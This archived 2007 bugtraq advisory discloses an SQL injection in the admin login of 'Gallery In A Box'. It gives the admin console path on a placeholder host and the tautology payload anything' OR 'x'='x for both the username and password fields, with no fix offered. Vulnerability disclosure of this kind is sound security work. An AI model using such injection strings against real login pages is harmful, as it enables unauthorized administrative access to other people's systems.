bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: [Aria-Security.Net] Gallery In A Box Username & Pas

[Aria-Security.Net] Gallery In A Box Username & Password Parameters SQL Injection

From: <Advisory_at_nospam>
Date: Thu Aug 02 2007 - 23:28:23 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)

A R I A - S E C U R I T Y


Gallery In A Box Username & Password Parameters SQL Injection Vendor: http://www.kerberosdev.net/

http://target.com/admin_console/index.asp

Username: anything' OR 'x'='x
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
Greetz: AurA